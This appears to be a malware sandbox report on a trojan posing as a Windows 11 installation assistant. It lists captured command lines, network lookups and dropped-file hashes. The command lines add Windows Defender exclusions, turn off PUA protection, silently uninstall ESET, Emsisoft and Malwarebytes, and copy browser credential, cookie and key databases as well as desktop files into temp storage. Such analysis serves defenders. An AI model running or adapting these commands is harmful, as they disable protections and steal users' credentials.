find /c /i "nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "safebrowsing.googleapis.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ars.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "apprep.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "c.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "feedback.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "ping.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nav.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.nf.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "t.urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "unitedstates.smartscreen-prod.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "urs.smartscreen.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\system32\find.exe
find /c /i "slscr.update.microsoft.com" "C:\Windows\system32\drivers\etc\hosts"
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="ESET Security" call uninstall /nointeractive
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rp.EXE /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rP.EXE /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sw:0 rEG.EXE add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rP.EXE /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /sW:0 rEg.EXE Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" add "hklM\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs" /V SCr /T rEG_dWOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
rp.EXE /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKLM\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns" /V Cmd /T rEg_dword /d 0 /f
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /SW:0 rEg.EXE Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEg.EXE
"C:\Windows\system32\rEg.EXE" Add "hKlm\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns" /V EXE /t rEg_dwOrd /d 0 /F
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
"C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe" /TI/ /Sw:0 rEG.EXE Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\system32\rEG.EXE
"C:\Windows\system32\rEG.EXE" Add "hklM\SoftwarE\MicroSOfT\windoWS dEfENdEr" /v pUAProTECTiOn /t rEG_dWOrd /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd""
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CUrL -S ipINFO.io/Ip
C:\Windows\SysWOW64\curl.exe
CUrL -S ipINFO.io/Ip
C:\Windows\System32\Wbem\WMIC.exe
wmic product where name="Emsisoft Anti-Malware" call uninstall /nointeractive
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "emsisoft anti-malware" /f
C:\Windows\system32\cmd.exe
cmd /c "C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe" /uninstall /verysilent /f
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr
"C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\otu1nf8f1aiuixcc240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t9h98yemuyztdw240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\daa28abfmq5240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\tj1lvkk7k240662078.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\eyoc8n14idxv240662078.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\5b3nneef5a1240677406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\8l46la0gojeru240677406.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\ohs8a31fx4mtk240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\61mtomzkbt02ht1240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\ru85pw6tqsjob9j240705343.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\eh3f6tu9lk240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\ntt3qcho6f240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\xrk0ql2wlekasq240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\1l01qph8240710578.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/43mkyhds.Admin\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\glwg4n1s240710578.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\3hcz52mjwq240719546.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/43mkyhds.Admin\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\y88z1j32vusu172m240719546.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\logins.json\" \"C:\Users\Admin\AppData\Local\Temp\8yuq9a72u6m1wcn240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key3.db\" \"C:\Users\Admin\AppData\Local\Temp\t4z4yu15iu595z240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\key4.db\" \"C:\Users\Admin\AppData\Local\Temp\5koqj2nxry240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\cert9.db\" \"C:\Users\Admin\AppData\Local\Temp\58tds0jd240728109.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/7fmsgkth.default-release\prefs.js\" \"C:\Users\Admin\AppData\Local\Temp\rz2ryztw8p3240728109.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\formhistory.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\22zcsr95n0240734140.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/7fmsgkth.default-release\cookies.sqlite\" \"C:\Users\Admin\AppData\Local\Temp\613ouc67y2mn36240734140.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\i9ovez9w3s3240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\44a6tcmrfbdc5240740437.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\0mp2sm4y240740531.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Google\Chrome\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\8fkndkl8m240740531.tmp\" -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\yaz0qkm4r81lkx240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\gu51pkiwl2r9240754171.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\6t7u44zsw7k4i99240754265.tmp\" -Force;cpi \"C:\Users\Admin\AppData\Local\Microsoft\edge\user Data\Default\..\Local State\" \"C:\Users\Admin\AppData\Local\Temp\ku2vwbo3c33240754265.tmp\" -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cpi \"C:\Users\Admin\Desktop\BlockUse.temp\" \"C:\Users\Admin\AppData\Local\Temp\fmxfkx2joq6ublbyu8yv.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CheckpointEnter.hta\" \"C:\Users\Admin\AppData\Local\Temp\g8hku1jq3xo4li210huykb.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\CompressConfirm.aiff\" \"C:\Users\Admin\AppData\Local\Temp\f06htrgpgf0ohtgj5rgy3k.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ConvertMerge.vsd\" \"C:\Users\Admin\AppData\Local\Temp\6l9b9kap2qesbbxrepr.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\DisableExport.rm\" \"C:\Users\Admin\AppData\Local\Temp\qijdw58b9daul52l035mwzlma61m1pkx.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnableHide.clr\" \"C:\Users\Admin\AppData\Local\Temp\a4e9fv6a6tsuzj1ik.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\EnterInitialize.vbe\" \"C:\Users\Admin\AppData\Local\Temp\vuqevmn7ikzd8qgl0cqknqdifrro5.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\FindSplit.emz\" \"C:\Users\Admin\AppData\Local\Temp\6qtn8jrhn2szxgf4x0flac5t5c.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\LimitSubmit.docx\" \"C:\Users\Admin\AppData\Local\Temp\2qj9ludo0g3451xxnp7mveo5c8e.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\MeasureReceive.txt\" \"C:\Users\Admin\AppData\Local\Temp\2608x592qgmq9o0b8k4.tmp\" -Force;cpi \"C:\Users\Admin\Desktop\ReadHide.jtx\" \"C:\Users\Admin\AppData\Local\Temp\d2i01njhgda6z0ft9.tmp\" -Force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | evcs-ocsp.ws.symantec.com | udp |
| US | 8.8.8.8:53 | ipINFO.io | udp |
| US | 34.117.59.81:80 | ipINFO.io | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| DE | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | evcs-crl.ws.symantec.com | udp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 74.19.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| SE | 192.229.221.95:80 | evcs-crl.ws.symantec.com | tcp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
Files
memory/4544-2-0x0000000000401000-0x00000000004B7000-memory.dmp
memory/4544-0-0x0000000000400000-0x00000000004E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-EJVTG.tmp\Trojan.Win32.DelShad.tmp
| MD5 | 40627c5fe58bb5a60606e5be621af052 |
| SHA1 | c21ec14767478d0e4bd1184ad6c2c280e2d1342f |
| SHA256 | bd4cbba2f23b512fad5b0c84d2e9502e4bfea75cac78482d22036968e8224b42 |
| SHA512 | e418ed7c9768a4237622be7a53b761a45ca4d4cf37643fcfdf9cb2f200a95fc904b213fb1a37befb86e6ff93ae3c5ff0f39243305789236d4031e017ec99085d |
memory/944-6-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-11-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/944-12-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-9-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/4544-14-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/4104-19-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\pik.exe
| MD5 | 78c269b72f5b1d9bd4654cef3fb4a986 |
| SHA1 | c44db702175e2d474e3221a0de14f01c1f35129b |
| SHA256 | ace03b12b8763bd8567425f288ded8f8f0d9acd62f81de17414bd300d21820ab |
| SHA512 | bc9abf69debc967df59e16491ec533ab59b997d8ea89d7ebc1ba0a04b319d5f3746cd9e22b8b2c10b4ce655fb5a813be08214e142e97107cb07222f7dc19bee5 |
memory/4212-185-0x00000000009F0000-0x0000000000A16000-memory.dmp
C:\tmp\.vbs
| MD5 | 2e2fa9827b9d476133f122be9012408c |
| SHA1 | 3a3d0d1135f95227693a46a110312a3c1a177c51 |
| SHA256 | 184fb09c2a02a1e5d23c9abe64affd866a919b7b287622069371716223f3b1b6 |
| SHA512 | 2e4a431fca5dada81cb22af865b122635b9b93e89b3948e86a2d6dd0c4b8eadbcf594ea1fb817818738468a831ecac75d7247d226d4ce901a9aaec66bc2c0e89 |
C:\tmp\.cmd
| MD5 | dee7acbdbf3f448057dae93e28514690 |
| SHA1 | ae56d802230bc13e7663be388781d7d1aa1ef3d0 |
| SHA256 | 5ec9a6efe3c3451a967335bf7d7bcb2f916fc8ba81c0b1118018d079fbffb5ec |
| SHA512 | 77cdd3ab66e49267907e3711ab7878469976ba677a683bead7d5e63353b03164345aef0ca0dd5d124488eca7cfef1f64ebde363d76596ef882cb2c56e1f41504 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk
| MD5 | c223a35366076d73ab31526be380631d |
| SHA1 | 5b8ba5941058637a11d271a2ba43f679717f62cc |
| SHA256 | 909ee3e3d9d9aee194ccf9401f21a5e6fa986845b657ce76dd10800f94a3b353 |
| SHA512 | 4d31081138dc079f7382bdd197be3088d2210870ee29574af146b3ebab55f197a1dea8cc6c0ef0184c7de6e13838a0cdf3d947d17cb521cbcce2d64c0b8bd359 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 3d19ae65bc53c6aa833b82ca7fa61cd4 |
| SHA1 | a3b94891864abdc9a8fec3022b3df060923ead46 |
| SHA256 | fcdc3e57b51ed726d90fca4aa19ba09e2bdb7a04fd573bf854465883aa326e14 |
| SHA512 | 8e4e3b8efa9d05497a27e79b82238bd9864ce3e1226ade8358491697173e19f6a12f2f181c64b481cd211ec5231804e9c683d72e5d0cf74208b7adb7a80f6e9c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | aba235b54047e7cb084612bb4da90487 |
| SHA1 | d82ce896f26da05719a159028c18a275ff7304c7 |
| SHA256 | d1437a37ed2e78fe4c82174a1981631a4710f023b4726f7431f7f3a02e209be0 |
| SHA512 | ee997aa717057b01d7ee0aaaddc05925caf4fc7a99f917c7a3b8ee472b926523501cdf26c1315b38463b368a329ec8f1bb47a22f07883b85bd183bbc39d7a7d9 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 1da12c8dc6dee2cf35786d7214c7c5cd |
| SHA1 | fe81b4162636a4f8ccc16d7ad8dd3e5c8165bc63 |
| SHA256 | 18396e55e85d07cc36c223bf7f30e3e2e2cb171e89313b622a6df041f1095333 |
| SHA512 | b465e1c2b1bd4ceb0a2f195c0666c6d4c3ec4b55131be652bfbdee8dff8c9b4f6f52b95ab7562b5ff669dd43e03996453563fc8a3a04ad9f33d141c1bf19f180 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | dae09e71a424a796e57972976432802e |
| SHA1 | 3190c52ba6422c5421f53b12d016cbaeaeafc14e |
| SHA256 | f89d667e7c4a1a85bba63ac8fb4eb4d55d442a323011f222d39b92308b4ecb62 |
| SHA512 | e96a6d8645ec1ea926d154c6ccb1ef6bf172e74a2301624d9de84200bb4c0d7fbe0404b7a0d362c9e1151889d18576bf1c17007b4260cf4b60d018b5506e0f7c |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 6193636e0937f9aa8d1a51760700fe36 |
| SHA1 | 0f31660fd9f0181c977d392c1af12d9ff4295f3b |
| SHA256 | a073d240b848ae572360eeb4a59493078121dd38e827152bb60b44b9b88d4000 |
| SHA512 | 899572343acb5a95fcca3325e6b0db1eaa759c8bfe05556cb1d6b3da7498c6e46e91d5a31dae067aaafeb37f776f601efe69481c1125cf1db57cd80d6034d544 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 9845dd85124401f5a66f558a8aca99b0 |
| SHA1 | bd1e578ff26e1f8ceac98a8e334cab116358ff1b |
| SHA256 | bd67f1c4cbd53fab37860e3039eb9f0d36f8d3d699c012ed73e0103300073eef |
| SHA512 | f6141adc9e43ea3fb70e63c38be2c5f49c7d68dd2121a5ff866665429cc78fbc11e6df9c9766901d3f6bdf7fa2dde43af6e46bf364fd9740d80268fdf59df33f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a61ea7aef83b5cf13a79f3261b754299 |
| SHA1 | 1b145d66880360213d9ebf1593aeb9146711500b |
| SHA256 | fc9d51689428140dd4cee3c9d5e7a85dbe2d38f8cbb182a453258de4866b533b |
| SHA512 | 3c73458b4532ccabf3996923d3d825626b5505b8f180e727d86fd7667b844e4022eced25c20507262182113d550f21a2b0f6d5acf2896a37e9ee894495ed33a4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 65b958df30a0d5264a6960b43d1ba803 |
| SHA1 | c5486386da0209c11d769be8db9a250cf91761a9 |
| SHA256 | f1d5f0d18e1caea663ebd7a953904bf783ae1eaafa25f7a0fbec1a36d47eb55a |
| SHA512 | 7845885e7c2d57f44f61daaec63b33fec69c6e712b79286fd33a295a2408813c48d68d7bc70ed144f87e30644b3e214eaaaa1ebb9e70a0af2c509c5d6cfe269d |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 93c55af47cde7b357a50adeafa4b7e0b |
| SHA1 | afff2bdbe8b05cd4aa3a93062673d8798e474d7b |
| SHA256 | f21a0e37e0d2ba27fdf62153e591f51cb40aa78007c4f86b38ed116bd4cb70a2 |
| SHA512 | f407b6d54fbe6afc119d0fcecf1201ad785ee05f3c791150343f0cefbffec8b92b34f371ebb6b5d8d0e47b0ff3a6ad51dcf150d6ce6bb77eaef9c481a5fb1226 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 30153c993d05eba1f074f5426d06d6b6 |
| SHA1 | 6111f38cff97f5f315c84929030e16d5e8895c4c |
| SHA256 | 0da79bd7b13e8ede21f933b07dc131f5c6660c6dea05abd213c5210639b53527 |
| SHA512 | 23a262bf715090bf0011cc4a3eb859ed21ab1fd792b6d39ae0c29892afce3acacfae2be9aa3e1df0006def44d6b3fd2bd5755807e58efc819f29ef2cfdf8ab42 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 37266ef3483bf46b93fe8bd1b5ef0be0 |
| SHA1 | 5523aeeaef268f04d5e28ba2333395835078b9e2 |
| SHA256 | a7958ee25a7cb12da3b75b0f1108d3d8063d373846d5ec4a1d793b696a568ddb |
| SHA512 | ee3c1971740413c0a123c437b6ffaaa45c2bc487064f3f79a3a74f0e9118e66ed7d8b5e93dcf6a0656c3721dec217b7122f71d0c7663a1ee28943b3f2fe11675 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | a57c2edf507991d9b7841950d5ba13ae |
| SHA1 | 73d3e83fb0416098737586205071e449e170bfa9 |
| SHA256 | 536825f9edd7ab2a8bac641368ce3f6e7e69d5f10c606a5ec83db824b72e51b3 |
| SHA512 | 224081bf959a0f3182782581e4872000512d06633ad9026f69c88183d426055e62ac28ca97513ee00e4144144f1f7bfd3f4add8fe720031b2f7ecb68a5ee8d77 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | ceffd1a4bd82dfd9ffcab66c348da323 |
| SHA1 | bfabe81531cadb591370eb6eaa5ade0ec8974e0c |
| SHA256 | 16108ca4ccf2d9b1f45e7eac33aa422200997465c8dac3ec8f8347aec5c51dde |
| SHA512 | e0fdfcdc72bb0b4194d4e994e04b528e67ab5b95a9d346da74a0f0e1d0aefa79d2a547892eacd29d5c9fbc4c8ffced4bd9dccdee8bee02c9d8e5ad5c6710e7a8 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 60c4a7e2cf4efaaa5dd1faf837dcbe8d |
| SHA1 | 1c21c8a9f1834affe9017e1843fa4bf8f8011624 |
| SHA256 | 1152acdf6b94a5d48d56b5cb78199be434106a5d223bbdce65c6a3d681296ff1 |
